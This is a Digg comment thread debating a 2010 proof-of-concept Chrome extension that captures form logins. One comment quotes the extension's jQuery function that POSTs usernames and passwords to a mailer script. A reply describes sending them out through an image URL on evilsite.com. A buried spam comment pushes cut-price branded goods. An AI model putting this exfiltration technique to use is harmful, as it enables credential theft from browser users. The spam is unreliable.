Users who Dugg This
Robert Wright
7403 Followers
AngelWardriver
11956 Followers
The Amplifier
7745 Followers
HotHardware.com
7858 Followers
bobosmitor
5476 Followers
sciguyajJul 10, 2010
Hackers always find a way.
moducJul 11, 2010
What a F*U article. How could things like this be in the news in the first place? Plugins ofcourse have been able to do things like this for ages. What's so special about it? Capture a form? Send an email? Capture a form and send an email? Plugin can have higher privilege than a normal page. Some has the same right as your local app. So, people need to treat plugins as programs they download. It has to have high quality an trusted.
theymosJul 11, 2010
Running random code on my computer might compromise my security??? I'm shocked!
mostballernousJul 10, 2010
I had to reinstall recently due to drive failure and was just about to go hunting for plugins. Even though I (usually) know better than to go installing plugins that I don't personally verify as safe, this is a good reminder!
doshindudeJul 10, 2010
....the only plugin you ever need to install after an OS rebuild is Flash.
npskenJul 11, 2010
Lastpass, Xmarks (does more than the built in Chrome Sync), Chrome Sniffer, Gmail Notifier, Sexy Undo Close Tab and other plugins for special tasks (depending on the person).
There... I just proved you wrong.
tyg10Jul 10, 2010
I REALLY detest these people....!!!!
penelernJul 10, 2010
Why ? Shouldn't be someone that tests and finds bugs in application so we can have better security ? Looks like Google staff didn't find this bug...it's good that we know about it... I do not think all hackers are bad...actually the crackers and script kiddies are bad but hackers is something else...
axcess99Jul 10, 2010
Not a bug, not a security hole, just a blatantly obvious malicious trojan extension using functionality similar to what LastPass https://chrome.google.com/extensions/detail/hdokiejnpimakedhajhdlcegeplioahd does.
The author doesn't say what message chrome displays prior to installation e.g. "This extensions want access to: Your data on all web sites, Your browsing history".
cron186Jul 11, 2010
I would not call this a bug. This is not an exploitable flaw unless you download a malicious add-on which is why pretty much every browser(including chrome) makes you go through a dialog box asking you if you trust the plugin. Are we at the point where we need to have signed plugins... maybe, but your local information is available to plugins because it is code that is running locally on your machine. I wound call this a security flaw due to people's lax attitude towards privacy/security not a bug.
dreasgrechJul 10, 2010
I'm the author of the plugin.
The reason I wrote the post is because people should be more aware of the plugins they install, rather than just blatantly installing everything they find. I'm not trying to hack people or steal login credentials; in fact, I did not upload it to Google's repository of extensions.
The content of the post is there to show that these things can actually happen, whether you like them or not.
axcess99Jul 10, 2010
Two questions for the author:
Why does it not require the cross-origin permission for the malicious-mailer-script domain (http://code.google.com/chrome/extensions/xhr.html#requesting-permission) or was that an accidental omission from the manifest file?
Why does your post not mention the warning message displayed when installing the extension.
"This extensions want access to: Your data on all web sites, Your browsing history". Doesn't really sound like a security but/flaw as much as dumb users not reading or caring about what they are doing.
xposeJul 10, 2010
Nice job writing the plugin. Should be interesting to see Google's response.
bdfarielloJul 10, 2010
I was actually going to install it and login with a thank you message, but now I can just say it here. Keep up the good work, Ethical Hacker.
breadfredJul 10, 2010
If I understand this correctly, when you install your plugin, the browser will warn you. If you ignore the warning, it will store passwords and user names. What we need is a program that stops ignorant people using the internet.
alo81Jul 11, 2010
I'm curious, what do you do with their information?
amazingandrexJul 11, 2010
For the record, Plugins != Extensions. Title is misleading.
samurimasterJul 10, 2010
Then you must not understand how exploits are found/reported/revealed/etc
7m7ufJul 11, 2010
I love these people! They not only find holes, but share them with the developer forcing them to act, and the end result, hopefully, is safer software. Would you rather that hole be out there for someone else to find? Someone that would use it in a not-so-nice fashion?
Be grateful one of the good guys found it.
axcess99Jul 10, 2010
Here are the
direct linking digg story http://new.digg.com/story/Andreas_Grech_s_Blog_Stealing_login_details_with_a_Google_C
direct link http://blog.dreasgrech.com/2010/07/stealing-login-details-with-google.html
drhuntzzzJul 10, 2010
Link: http://www.chromeextensions.org/utilities/ie-tab/
themazzterJul 11, 2010
At first I thought you were trolling, then I got the joke*. I need sleep.
* - IE trashes Chrome's security lol.
Closed AccountJul 10, 2010
Where is your God now?
esb82Jul 11, 2010
http://www.authorama.com/fables-16.html
esb82Jul 11, 2010
I assume (the lack of replies leaves me no choice) that I'm getting buried because, superficially, this fable appears to support theism. Look again, diggers. I'm an atheist, btw.Comment is buried, click here to see the rest.
seltaeb4Jul 10, 2010
You've been Chrom'd.
skeloothJul 10, 2010
This is possible in any browser that supports javascript based plugins. This actually isn't even all that "clever", this is script kiddie stuff. Write something that gives access to a subshell and maybe you can have some 'street cred'.
displaylistJul 11, 2010
The term is "plug-in".
zarcuJul 10, 2010
Plug that "whole" google!
breadfredJul 10, 2010
It is not a google whole. The author choose google as it is perceived as a safe platform. This is more a social exploit then a technical one - users will have to grant the program access!
Closed AccountJul 11, 2010
Should they plug the whole hole? Or is it just a holy whole? The whole world must know of this hole.
truejournalsJul 10, 2010
I almost dugg this, but this is just plain bogus news.
1. The hacker did not create a plugin, it's an extension. There's a difference.
2. It's a ridiculously simple extension that, as pointed out by skelooth is "script kiddie stuff". Before installing an extension, you should look through reviews, and see what it does. Bad reviews? Don't install uickly deit! This is why you should install extensions only from Google's "repository" at https://chrome.google.com/extensions?hl=en-US I've gotta think that an extension that does this would be quickly deleted.
3. This is like saying Firefox has a huge security whole because you can install a greasemonkey script that does the same thing.
Overall, this is not only inaccurate, but just plain non-news.
reziarfgJul 11, 2010
Point is, maybe it can both do something useful, to make you unaware of its malicious functions.
Then the reviews would read something like "Great extension for checking weather!" but in the background it's stealing your login credentials.
Then Google might not go through the extensions with a fine tooth comb and miss the malicious part.Comment is buried, click here to see the rest.
themazzterJul 11, 2010
Yeah I can't understand how this made front page of /. earlier. The extension warns you what permissions the extension is requesting when you install it.
Firefox and IE don't even do that, Chrome is still the most secure out of them.
Closed AccountJul 11, 2010
Sure, next you're going to say I shouldn't install random programs I get in unsolicited emails.
What do I look like, a programologist?!
archcoderJul 10, 2010
"Google can plug the whole"
This upsets me more than the vulnerability.
magzineJul 11, 2010
Good hackers/programmers generally write better code than English.
I see no problem.
atarioJul 11, 2010
But can they accidentally the whole?
b3n87Jul 11, 2010
hole?
shadowspawnJul 11, 2010
Dude, you can do this with ffx.
Fact is, and this is just a scare-tactic article to get hits, don't install plugins from sources you don't trust. And most plugs should be open source anyway, so you can trust on the public to find problems with them.
Oh yea, like you'd install XXX-FREE!!!-China-Porn-LIVE0From-Russa.xpi
C'mon now.
themazzterJul 11, 2010
It's even easier in FF since extensions are given free reign of the computer (well the browser, but there are legitimate ways to break out AFAIK) without the user having to consent like in Chrome.
crazyjoe123Jul 11, 2010
Just like that FF add-on that runs a .exe to help prevent memory leaks. FF add-ons can pretty much do anything.
Closed AccountJul 11, 2010
Oh comeon, I just installed that extension and it's simply amaz
displaylistJul 11, 2010
if this dude WERE slick
Closed AccountJul 11, 2010
======== http://www.xolook.com/ ========
"Hello, you need not worry, can see came to see! We cannot demand of you to buy, just want to let you enjoy our new Jordan" Engrish at its finest.
http://www.xolook.com
We need your support and trust!!!
Dear friends, please temporarily stop your footsteps
To our website Walk around A look at
Maybe you'll find happiness in your sight shopping heaven and earth
You'll find our price is more suitable for you.
Welcome to our website http://www.xolook.com
Next we come to talk about a topic:
Why are now prices are very expensive%uFF1F
yes Many people now have to earn more money
to Pushing up prices
But they didn't find customers buy after won't come back
But friends %uFF0CDo you ever found
Our website is more cost-effective price than others
Want to know why?
The answer is:
We are not the point to earn money
We are long-term trade marketing
We are for the benefit of customers%u3001
Why our customers will be so much?
Are the prices we meet their needs.
Such as:
COACH Bag (Market Price:$69 Our Price:$31.00 )
Ed Hardy hoody (Market Price: $89 Our Price: $41.00)
AF t-shirt long (Market Price: $48 Our Price: $25.00)
POLO t-shirt Short huge (Market Price: $48 Our Price: $14.00)
AF1 low (Market Price: $79Our Price: $45.00)
Jordan 11 Special (Market Price: $79 Our Price: $46.00)
Our price is more suitable for you?
If is the word.
Then what you waiting for?
Hurry movement of your mouse
Enjoy shopping pleasure,
Additionally, we also free shipping%u3001Only charge a small Insurance.
Thanks to the support!
http://www.xolook.comComment is buried, click here to see the rest.
aualinJul 11, 2010
I find this funny, considering you all believe a feature to be a bug. It's a feature to be able to read and write to the DOM of any open page in your browser. When you install an extension you actually get a big fat warning that this is the case, how can this then be newsworthy enough to get on the Digg frontpage when everyone who has installed an extension in either Chrome, or Firefox, has had a huge f**king popup smash his face.
soopaflyJul 11, 2010
Haha. Take that Apple!! Oh wait. This is about Google? I'm sure it was intentional.
zzzblazJul 11, 2010
Crappy article is... crappy.
ptfoeJul 11, 2010
FF FTW
myztryJul 11, 2010
The whole plugin architecture needs to be re-thought. Few types are as lame and dangerous Microsoft knee-jerk reaction to Java known as Active-X but now that they have settled in, it needs to be done right.
1. Have the IEEE (or similar body) build a virtual non-privileged JIT compatible instruction set as a standard. This should be implemented by whichever OS as allowing applications to create executable code is just plain moronic and defeats the whole purpose of things like DEP (Data Execution Prevention) by requiring exemptions. This shall not include any API definitions.
2. Have the ISO (or similar body) define a standard/"exec.library" that defines core language API that covers the basics such as memory allocation, string handling and other low level sub-OS type API. This too shall be implemented by the OS so as to align to the paradigm in use (OO, realtime, embedded, etc).
3. Have the W3C (or similar body) define a browser level API. This shall be implemented solely by the browser or relevant system. The browser system will achieve JIT compilation for fast and efficient plug-in architecture by requesting the underlying OS to compile the byte code against the relevant API and nothing else. The resulting code shall never have more privilege than the application that requested it to be compiled. Even platform dependant applications could be compiled on any architecture as long as the API (or part thereof) was implemented.
Frankly, Flash, .NET, Java, etc. all need to go and be replaced by something defined by an open standards body that assigns the roles to the appropriate systems. Otherwise it's all going to remain in the insecure incompatible mess that it is currently in.
Comment is buried, click here to see the rest.
bloodwineJul 11, 2010
the best thing about standards is how many revisions there are to choose from, and gray areas left for interpretation.
I'm not saying that standards are bad, but they are no silver bullet and are no guarantee.
myztryJul 11, 2010
They are no guarantees in life full stop. What is your point?
bloodwineJul 11, 2010
my point is that I have worked with many different types of standards, and while they help, they still have lots of issues. Specifically, I do a lot of work dealing with HL7. Talk about a horrible standard.
cesclaveriaJul 11, 2010
Ok, all of that is great and all but it is not that relevant in this case. The extension discussed in the article never asked for more permissions and never was compiled, it was just some javascript reading values on a form.
myztryJul 11, 2010
It is relevant because it's not working. Scripting is inefficient and unable to be pre-evaluated. Really it is just a tentative work around trying to fit into the text based world of HTML (even though things such a 7bit data transfers that resulted in things like UUE are no longer relevant).
HTML is really a document description language. It's not a programming language. The two should not be combined except at the time that was the easiest even if not the best solution. Time to get serious about it. The web is a big thing now.
displaylistJul 11, 2010
Plug-in. The term is "plug-in".
skeloothJul 11, 2010
I wish I could bury a million times.
skeloothJul 11, 2010
That would never work. Design by committee is a pipe dream, and takes power away from the developers to do it right.
esc27Jul 12, 2010
Except, 50 years later when those standards are finally ratified we are using something else.
johnnysoftwareJul 29, 2010
I agree with part of what you are saying. I disagree with other parts. For one thing, a standards body does not necessarily hammer out a design that will wind up resulting in secure implementations. In fact, that has failed to happen in a bunch of cases.
Look at image reading/rendering software built into most operating systems, which in turn is used by web browsers and a ton of other applications on that computer. In the past decade, we have had a number of security flaws exist and in cases even be exploited: JPEG, etc.
These file specs and even algorithms are totally defined by standards bodies. And yet, OS makers get them wrong.
I do think image rendering codecs should be open sourced so that we do not have these problems continue. The same goes for HTML renderers, JavaScript interpreters. And anything near as ubiquitous as Flash which has a track record of being exploited so much should be open sourced or better yet broken up into manageable pieces. Apparently, Flash is too big right now for the company to find the bugs in it. Microsoft has more problems than everyone else finding bugs in IE too, possibly for the same reasons.
stealthspcJul 11, 2010
This is a retarded hack. Chrome is designed to give extension developers this much access. This is why it prompts you when you decide to download an extension. It's like an application on your computer stealing your password you type into it. Not a security problem.
jqp123Jul 11, 2010
For years, people trashed the ActiveX concept in IE ... and then others re-created it.
Labeling it a feature instead of a bug never really worked for MS ... why should it work for Google now?Comment is buried, click here to see the rest.
Closed AccountJul 11, 2010
I DONT RUN PLUGINS BECAUSE IT"S FASTER!
Closed AccountJul 11, 2010
Hacker creates virus where DIGG becomes overrun by evolution deniers add creationists. Some opinions are so stupid they don't need an outlet, but Digg has become a place for those people to come to. f**k it. I'm out. I'll miss you, digg, but not that much, here's my farewell letter:
http://digg.com/arts_culture/Peace_out_Digg_I_m_going_to_miss_youComment is buried, click here to see the rest.
Closed AccountJul 11, 2010
Thanks for your post
http://www.hollywoodonlinedownload.blogspot.com
iamacyborgJul 11, 2010
This code wouldn't work, because AJAX calls are only allowed within the same domain. The only way this could possibly work is if the domain that you're stealing the password from also has a form for sending e-mails to an arbitrary address, which is pretty god damn unlikely.
# sendEmail = function(username, password, url, callback) {
# var msg = getMessage(username, password, url);
# $.ajax({
# type: 'POST',
# url: 'the url of the mailer script', //Change to the path of your mailer script
# data: 'the headers you want to send', //Change to add any headers to be sent along
# success: callback
# });
# }
memyJul 11, 2010
That's not entirely true. Cross-domain POST requests work, within some limits:
- The remote server has to respond properly to an OPTIONS request, explicitly allowing the remote origin to POST. This is done at the bad guy's server, so no problem;
- You can't read the remote server's reply to the POST request. The callback never gets called, even though the request gets completed.
Despite those limitations, it is certainly possible to steal passwords that way, considering that the request's reply is irrelevant in this case (at that point, the password has already been sent).
Of course, one could make things simpler by creating an image object and setting its src to evilsite.com/mail.php?username=[username]&password=[password], avoiding this jQuery mess altogether.
displaylistJul 11, 2010
The term is "plug-in", not "plugin." Hyphens aren't that hard. Use them.
buckrogers1965Jul 11, 2010
No, it's-not.
skeloothJul 11, 2010
Maybe you want to go to Mozilla and tell them to fix their typos? https://addons.mozilla.org/en-US/firefox/browse/type:7 Because they have it spelled plugins all over the website.
ronnisrJul 11, 2010
Lame article. Any program or OS for that matter can open doorways if you allow it by installing s**t like this. Plain stupid!
k3nt0456Jul 11, 2010
... Wait extensions can do calls to arbitrary domains? What could possibly go wrong
ferrisnoxJul 11, 2010
Vote for Opera, doesn't need plugins for speeddial, mouse gestures, syncing, voice, notes, pretty much all of the useful things there are plugins for. Security out of the box.
nicko68Jul 12, 2010
Switched back to Opera recently, I love it.
schneidz101Jul 11, 2010
fta:
"be extra careful when you install any Chrome plugin"
this implies that firefox/ ie are insusceptible to this type of flaw; i doubt that is the case.
wtfheadexplodyJul 11, 2010
In other news the Chrome Browser allows you to respond to emails from Nigerian scams! Chrome is obviously responsible for the millions of dollars lost to online scams, and not the end-user. Obviously, another failure in the security of the Chrome browser.
lakeeffectJul 11, 2010
Hint: It wasn't adobe.
astrotrainJul 12, 2010
This is why I stick to my Mozilla guns...Chrome may be faster then Firefox...but it looks like its not as secure..especially when it comes to plugins.
geohacJul 13, 2010
This isn't surprising, since it already happened to firefox.
nazrootJul 23, 2010
Come on man..
spacebuddyJul 29, 2010
Another reason to keep away from Chrome and FireFox.